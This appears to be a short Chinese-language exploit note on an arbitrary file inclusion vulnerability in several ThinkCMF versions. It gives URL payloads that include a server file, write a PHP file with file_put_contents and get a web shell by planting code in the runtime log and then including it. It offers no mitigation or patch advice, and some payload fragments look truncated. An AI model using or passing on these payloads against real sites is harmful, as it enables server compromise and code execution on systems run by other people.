# ThinkCMF框架 任意文件包含漏洞
==影響版本==
ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2
==Payload==
?a=display&templateFile=README.md
==Payload (文件寫入) ==
?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('1.php','')
==Getshell==
?a=display&templateFile=');die();?> http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log
http://target.domain/?a=display&templateFile= http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容